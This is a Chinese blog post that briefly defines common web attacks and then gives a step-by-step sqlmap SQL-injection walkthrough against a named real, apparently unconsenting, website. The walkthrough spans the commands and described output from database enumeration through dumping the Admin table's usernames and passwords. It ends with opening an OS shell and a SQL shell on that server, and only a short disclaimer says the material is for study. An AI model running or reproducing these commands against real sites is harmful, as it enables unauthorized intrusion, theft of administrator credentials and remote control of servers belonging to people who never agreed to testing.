好几天没有更新博客了,主要是博主没时间,白天要搬砖,又不想水文章,只想呈现满满的干货。今天带大家进入一个神秘领域,黑客的世界......
常见攻击手段
XSS攻击:利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序
CSRF攻击:跨站请求伪造,攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求
DDOS攻击:通过大规模互联网流量淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或网络正常流量的恶意行为
SQL注入:将SQL代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法
攻击工具
本篇只针对SQL注入攻击做实战演示,其他攻击手法以后博主有时间再写吧。所用工具:SQLMAP,关于SQLMAP的介绍和安装我这里就不作更多的赘述了,感兴趣的朋友可以参考我之前写的:centos7 安装sqlmap及利用sqlmap 进行SQL注入详解 ,注:windows环境下也可安装sqlmap,自己百度下。
寻找靶机
寻找靶机这个多少碰点运气,因为现在开发人员对sql漏洞越来越重视,以及流行框架已经从底层给你规避了这种风险,已经很少网站存在sql注入漏洞了。但是,只要存在,这将是致命的。这里以【中国花炮网】:http://www.zghpw.com/ 给大家做个演示。再次郑重申明:本篇内容仅供个人学习参考使用,恶意攻击是违法行为,由此引发的一切后果自行承担,与本站无关。
寻找注入点
输入以下代码,--dbs代表爆出该网站所有数据库,假如该链接存在sql注入漏洞,将会得到下图所示
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --dbs
该图给了我们如下信息:
操作系统:windows2019 or 2016 or 10
语言:asp,.net开发
数据库:sql server 2005
可用数据库:fireworknet、master、model、msdb、tempdb
寻找当前使用数据库
输入以下命令,寻找网站当前使用的数据库,这里就不贴图了,会返回 current database: 'fireworknet'
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --current-db
爆破数据表
通过上面的信息,我们已经找到网站所属数据库为:fireworknet,执行如下指令,爆出fireworknet数据库下所有表,将会得到下图所示:
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" -D fireworknet --tables
通过上图信息我们可以知道fireworknet数据库下一共有31张表
爆破表字段
输入以下代码,爆破Admin表字段,将会得到下图所示
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" -D fireworknet -T Admin --columns
通过上图信息我们可以了解到:fireworknet数据库下Admin表有8个字段
爆破表内容
输入以下代码,打印出Admin表,Admin_ID、Admin_Name、Admin_PWD字段,将会得到如下图所示。至此,从寻找sql漏洞到利用漏洞爆破数据库所有表数据完结......
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" -D fireworknet -T Admin -C Admin_ID,Admin_Name,Admin_PWD --dump
进阶玩法
创建与系统交互的shell窗口
输入以下代码,将得到下图所示
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --os-shell
os-shell中比如输入ipconfig/all命令:(将会爆出服务器内网ip地址等信息)
创建SQL shell
输入如下命令,在sql-shell中输入:select * from Extend,将会得到下图所示
python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --sql-shell